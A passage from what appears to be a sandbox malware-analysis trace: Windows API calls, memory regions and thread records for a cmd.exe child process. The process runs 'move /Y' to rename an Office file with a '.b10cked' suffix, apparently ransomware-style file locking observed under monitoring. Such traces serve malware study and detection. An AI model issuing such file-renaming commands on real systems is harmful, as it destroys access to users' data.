hFindFile=0x282128 | out: hFindFile=0x282128) returned 1 [0157.581] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e8c8 | out: _Buffer=" 1") returned 9 [0157.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.581] GetFileType (hFile=0x7) returned 0x2 [0157.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0157.581] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e854 | out: lpMode=0x20e854) returned 1 [0157.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.581] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e888 | out: lpConsoleScreenBufferInfo=0x20e888) returned 1 [0157.581] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0157.582] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e8c8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0157.582] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x20e8ac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e8ac*=0x1a) returned 1 [0157.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.582] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.582] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.583] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.583] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.583] SetConsoleInputExeNameW () returned 0x1 [0157.583] GetConsoleOutputCP () returned 0x1b5 [0157.583] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.583] SetThreadUILanguage (LangId=0x0) returned 0x409 [0157.583] exit (_Code=0) Process: id = "264" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0x324" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21753 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21754 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21755 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 21756 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21757 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21758 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21759 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21760 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 21761 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21777 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21778 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21779 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21780 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 21781 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 21782 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21783 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21784 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21785 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21786 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21787 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21788 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21789 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21790 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21791 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 21792 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21793 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21794 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21795 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21796 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21797 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21798 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 21799 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21800 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001170000" filename = "" Thread: id = 327 os_tid = 0xf70 [0157.999] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f8dc | out: lpSystemTimeAsFileTime=0x26f8dc*(dwLowDateTime=0x981b9c40, dwHighDateTime=0x1d440a9)) [0157.999] GetCurrentProcessId () returned 0x324 [0157.999] GetCurrentThreadId () returned 0xf70 [0157.999] GetTickCount () returned 0x30618 [0157.999] QueryPerformanceCounter (in: lpPerformanceCount=0x26f8d4 | out: lpPerformanceCount=0x26f8d4*=21478804118) returned 1 [0158.000] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0158.000] __set_app_type (_Type=0x1) [0158.000] __p__fmode () returned 0x76b331f4 [0158.000] __p__commode () returned 0x76b331fc [0158.000] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0158.000] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0158.000] GetCurrentThreadId () returned 0xf70 [0158.000] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf70) returned 0x38 [0158.000] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.000] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0158.001] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.001] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.001] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f86c | out: phkResult=0x26f86c*=0x0) returned 0x2 [0158.001] VirtualQuery (in: lpAddress=0x26f8a3, lpBuffer=0x26f83c, dwLength=0x1c | out: lpBuffer=0x26f83c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.001] VirtualQuery (in: 
lpAddress=0x170000, lpBuffer=0x26f83c, dwLength=0x1c | out: lpBuffer=0x26f83c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0158.001] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f83c, dwLength=0x1c | out: lpBuffer=0x26f83c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0158.001] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f83c, dwLength=0x1c | out: lpBuffer=0x26f83c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.001] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f83c, dwLength=0x1c | out: lpBuffer=0x26f83c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0158.001] GetConsoleOutputCP () returned 0x1b5 [0158.001] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.001] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0158.001] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.002] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0158.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.002] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.002] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.002] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.002] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.002] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.002] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0158.003] GetEnvironmentStringsW () returned 0x370210* [0158.003] 
FreeEnvironmentStringsW (penv=0x370210) returned 1 [0158.003] GetEnvironmentStringsW () returned 0x370210* [0158.003] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0158.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7dc | out: phkResult=0x26e7dc*=0x40) returned 0x0 [0158.003] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0xa0, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.003] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x1, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.003] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0x1, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.003] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x0, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x40, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x40, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, 
lpData=0x26e7e8*=0x40, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.004] RegCloseKey (hKey=0x40) returned 0x0 [0158.004] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7dc | out: phkResult=0x26e7dc*=0x40) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0x40, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x1, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0x1, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x0, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x9, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x4, lpData=0x26e7e8*=0x9, lpcbData=0x26e7e0*=0x4) returned 0x0 [0158.004] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7e4, lpData=0x26e7e8, lpcbData=0x26e7e0*=0x1000 | out: lpType=0x26e7e4*=0x0, lpData=0x26e7e8*=0x9, lpcbData=0x26e7e0*=0x1000) returned 0x2 [0158.004] 
RegCloseKey (hKey=0x40) returned 0x0 [0158.004] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886380 [0158.004] srand (_Seed=0x5b886380) [0158.004] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked\"" [0158.004] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked\"" [0158.005] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.005] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.005] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.005] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.005] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.006] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.006] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.006] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.006] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.006] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.006] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.006] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0158.006] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.006] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.006] GetEnvironmentStringsW () returned 0x372360* [0158.006] FreeEnvironmentStringsW (penv=0x372360) returned 1 [0158.007] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.007] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.007] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.007] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.007] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.007] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.007] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.007] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.007] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.007] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.007] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f5a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.007] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f5a8, lpFilePart=0x26f5a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f5a4*="Desktop") returned 0x18 [0158.007] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.007] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f324 | out: lpFindFileData=0x26f324) returned 0x3709f0 [0158.008] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0158.008] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f324 | out: lpFindFileData=0x26f324) returned 0x3709f0 [0158.008] 
FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0158.008] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f324 | out: lpFindFileData=0x26f324) returned 0x3709f0 [0158.008] FindClose (in: hFindFile=0x3709f0 | out: hFindFile=0x3709f0) returned 1 [0158.008] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.008] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0158.008] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0158.009] GetEnvironmentStringsW () returned 0x370210* [0158.009] FreeEnvironmentStringsW (penv=0x370210) returned 1 [0158.009] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.009] GetConsoleOutputCP () returned 0x1b5 [0158.010] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.010] GetUserDefaultLCID () returned 0x409 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f6e8, cchData=128 | out: lpLCData="0") returned 2 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f6e8, cchData=128 | out: lpLCData="0") returned 2 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f6e8, cchData=128 | out: lpLCData="1") returned 2 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0158.010] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0158.011] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0158.011] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0158.011] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0158.012] GetConsoleTitleW (in: lpConsoleTitle=0x360930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.012] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.012] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0158.012] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0158.012] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0158.013] _wcsicmp (_String1="move", _String2=")") returned 68 [0158.013] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0158.013] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0158.013] _wcsicmp (_String1="IF", _String2="move") returned -4 [0158.013] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0158.013] _wcsicmp (_String1="REM", _String2="move") returned 5 [0158.013] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0158.018] GetConsoleTitleW (in: lpConsoleTitle=0x26f3e0, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.068] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0158.068] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0158.068] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0158.068] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0158.068] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0158.068] _wcsicmp (_String1="move", _String2="CD") returned 10 [0158.068] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0158.068] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0158.068] _wcsicmp (_String1="move", _String2="REN") returned -5 [0158.068] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0158.068] _wcsicmp (_String1="move", _String2="SET") returned -6 [0158.068] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0158.068] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0158.068] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0158.068] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0158.068] _wcsicmp (_String1="move", _String2="MD") returned 11 [0158.069] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0158.069] _wcsicmp 